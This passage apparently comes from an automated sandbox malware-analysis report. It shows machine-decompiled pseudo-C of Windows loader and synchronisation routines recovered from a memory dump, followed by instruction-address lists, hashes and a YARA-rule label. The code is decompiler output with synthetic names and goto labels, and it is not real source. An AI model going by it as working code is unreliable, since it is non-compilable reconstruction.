									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01007D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xfc5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0101F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0101F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01067016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01002400(_t267 + 0x20);
															}
															L01002400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01012397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01002280(_t134, 0x10d8608);
									__eflags =  *0x10d6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00FFFFB0(_t198, _t241, 0x10d8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x10d6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x10d8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01016B90(_t210,  &_v64);
										_t262 =  *0x10d8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0101E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E010297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0102006A(0x10d8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x10d8608);
												E0102B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x10d6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x10d6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00FFFFB0(_t198, _t240, 0x10d8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E010200C2(0x10d8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x010120a0
0x010120a8
0x010120ad
0x010120b3
0x010120b8
0x010120c2
0x010120c7
0x010120cb
0x010120d2
0x01012263
0x01012266
0x01055836
0x01055836
0x00000000
0x0101226c
0x0101226c
0x01012270
0x01012274
0x010120e2
0x010120e2
0x010120e6
0x010120ee
0x010557dc
0x010557de
0x010557ec
0x010557ec
0x010557f1
0x010557f3
0x010557f8
0x00000000
0x010557f8
0x010557e0
0x010557e4
0x010557ea
0x00000000
0x00000000
0x00000000
0x010557ea
0x010120f4
0x010120f4
0x010120f8
0x010120f8
0x010120fc
0x01012100
0x01012106
0x01012201
0x01012206
0x0101220b
0x0101220e
0x010122a9
0x010122ac
0x00000000
0x00000000
0x010122b2
0x010122b5
0x01055801
0x01055806
0x00000000
0x00000000
0x01055810
0x01055815
0x01055818
0x00000000
0x00000000
0x0105581e
0x010122bb
0x010122bb
0x01012218
0x01012218
0x0101221c
0x01012220
0x01012222
0x010122c2
0x010122c4
0x010122dc
0x010122dc
0x010122e1
0x00000000
0x00000000
0x00000000
0x010122e7
0x010122c8
0x010122cd
0x010122d3
0x010122d6
0x01055823
0x01055825
0x01055827
0x00000000
0x00000000
0x0105582d
0x00000000
0x0105582d
0x00000000
0x01012228
0x01012228
0x00000000
0x01012228
0x01012222
0x01012214
0x01012214
0x00000000
0x01012114
0x01012114
0x01012114
0x0101211a
0x0101211c
0x01012348
0x0101234d
0x01055840
0x01055845
0x01055848
0x0105584e
0x0105584e
0x01055848
0x01012353
0x01012355
0x01012388
0x01012388
0x01012368
0x0101236a
0x0101236c
0x0101238f
0x00000000
0x0101236e
0x0101236e
0x0101218e
0x0101218e
0x01012191
0x01012195
0x01055a03
0x01055a06
0x01055a0c
0x01055a0f
0x01055a11
0x01055a13
0x01055a13
0x01055a19
0x01055a1f
0x00000000
0x0101219b
0x0101219b
0x010121a0
0x01012282
0x01012284
0x01012284
0x01012284
0x01012284
0x010121a6
0x010121a9
0x010121ac
0x010121ae
0x010121b3
0x0101228b
0x01012290
0x01012379
0x01012296
0x01012298
0x01012298
0x01012290
0x010121b9
0x010121be
0x010122a2
0x010122a2
0x010121c4
0x010121c8
0x010121cc
0x010121d0
0x010121d4
0x010121de
0x010121e3
0x01055a29
0x01055a2c
0x00000000
0x00000000
0x01055a3b
0x00000000
0x010121e9
0x010121e9
0x010121e9
0x010121ee
0x010121f1
0x01055a45
0x01055a4b
0x01055a52
0x01055a58
0x01055a5d
0x01055a5f
0x01055a71
0x01055a61
0x01055a6a
0x01055a6a
0x01055a76
0x01055a79
0x01055a7f
0x01055a83
0x01055a85
0x01055a87
0x01055a87
0x01055a8c
0x01055a91
0x01055a97
0x01055a9f
0x01055aa0
0x01055aa1
0x01055aa6
0x01055aab
0x01055ab1
0x01055ab3
0x01055ab9
0x01055aca
0x01055ad4
0x01055ad4
0x01055ade
0x01055ade
0x01055aab
0x01055a79
0x01055a52
0x010121f7
0x010121f9
0x010121fe
0x010121fe
0x010121e3
0x01012195
0x0101236c
0x01012122
0x01012122
0x01012124
0x01012231
0x01012236
0x01012236
0x01012238
0x01012238
0x01012240
0x01012242
0x01012244
0x010559fc
0x0101218c
0x0101218c
0x00000000
0x0101218c
0x0101224a
0x0101224f
0x01012256
0x01012304
0x01012309
0x0101230f
0x0101231e
0x0101231e
0x0101231e
0x01012320
0x01012325
0x0101232a
0x0101232c
0x0101233e
0x0101233e
0x00000000
0x0101232c
0x01012311
0x01012317
0x0101231a
0x0101231c
0x01012380
0x01012380
0x01012380
0x01012384
0x00000000
0x00000000
0x01012386
0x00000000
0x0101231c
0x0101225c
0x0101225c
0x00000000
0x0101225c
0x0101212a
0x01012134
0x01012138
0x0101213d
0x01055858
0x01055863
0x01055863
0x01055867
0x0105586a
0x00000000
0x00000000
0x0105586c
0x0105586c
0x01055871
0x01055875
0x01055877
0x01055997
0x0105599c
0x010559a1
0x010559a7
0x010559a7
0x00000000
0x010559a7
0x0105587d
0x00000000
0x0105588b
0x0105588b
0x01055890
0x01055892
0x01055894
0x01055899
0x0105589b
0x010558a0
0x010558a0
0x010558aa
0x010558b2
0x010558b6
0x010558be
0x010558c6
0x010558c9
0x0105590d
0x01055917
0x0105591a
0x0105591c
0x01055920
0x01055928
0x0105592a
0x0105592c
0x0105592e
0x0105592e
0x010558cb
0x010558cd
0x010558d8
0x010558e0
0x010558f4
0x010558fe
0x010558fe
0x0105593a
0x0105593e
0x01055940
0x01055942
0x00000000
0x01055944
0x01055944
0x01055949
0x0105594e
0x0105594e
0x01055953
0x0105595b
0x01055976
0x01055976
0x0105597a
0x0105597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01055981
0x01055981
0x01055981
0x01055983
0x01055988
0x0105598d
0x01055991
0x01055991
0x00000000
0x0105595d
0x0105595d
0x01055963
0x01055965
0x00000000
0x00000000
0x00000000
0x00000000
0x01055967
0x01055967
0x0105596b
0x0105596d
0x00000000
0x00000000
0x0105596f
0x01055971
0x01055971
0x01055974
0x00000000
0x00000000
0x00000000
0x01055974
0x00000000
0x01055967
0x0105595b
0x01055942
0x01055863
0x01012143
0x01012143
0x01012149
0x0101214f
0x010122f1
0x010122f6
0x00000000
0x01012173
0x01012173
0x0101217d
0x01012181
0x01012186
0x010559ae
0x010559b2
0x010559b5
0x010559b7
0x010559ba
0x010559cd
0x010559d1
0x010559d5
0x010559d9
0x010559db
0x00000000
0x00000000
0x010559dd
0x010559dd
0x010559e1
0x010559e4
0x010559e7
0x010559ee
0x010559ee
0x010559f3
0x010559f3
0x00000000
0x01012186
0x0101214f
0x01012106
0x01012266
0x010120d8
0x010120da
0x010120e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
Instruction ID: cc636def472893938a569dd11de42e03a4e54261d53da5ac9eb7cf3793bb1200
Opcode Fuzzy Hash: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
Instruction Fuzzy Hash: 61F102316083419FEBA6CF2CC8407AF7BE1AF95324F24859DE9D59B285D739D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00FFD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x10dd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00FF6600(0x10d52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x10d7b9c; // 0x0
							_t281 = L01004620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0102F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x10d7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x10d7b8c; // 0xb82b70
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01002280(_t200, 0x10d84d8);
									_t277 =  *0x10d85f4; // 0xb83060
									_t351 =  *0x10d85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xb82ff8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00FFFFB0(_t287, _t353, 0x10d84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0103CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00FF6600(0x10d52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00FF7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x10db239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0106E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x10d8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x10db1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x10db218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01002280(_t250, 0x10d84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01023898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00FFFFB0(_t293, _t353, 0x10d84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E010237F5(_t353, 0);
																}
																E01020413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01019B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E010102D6(_t174);
																}
																L010077F0( *0x10d7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0101C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00FFEC7F(_t353);
										L010119B8(_t287, 0, _t353, 0);
										_t200 = E00FEF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x10db2f8 |  *0x10db2fc) == 0 || ( *0x10db2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0102B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x10db2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01096B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01096AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00FFE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00FFEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01029730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00FFE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00FF8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01023C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
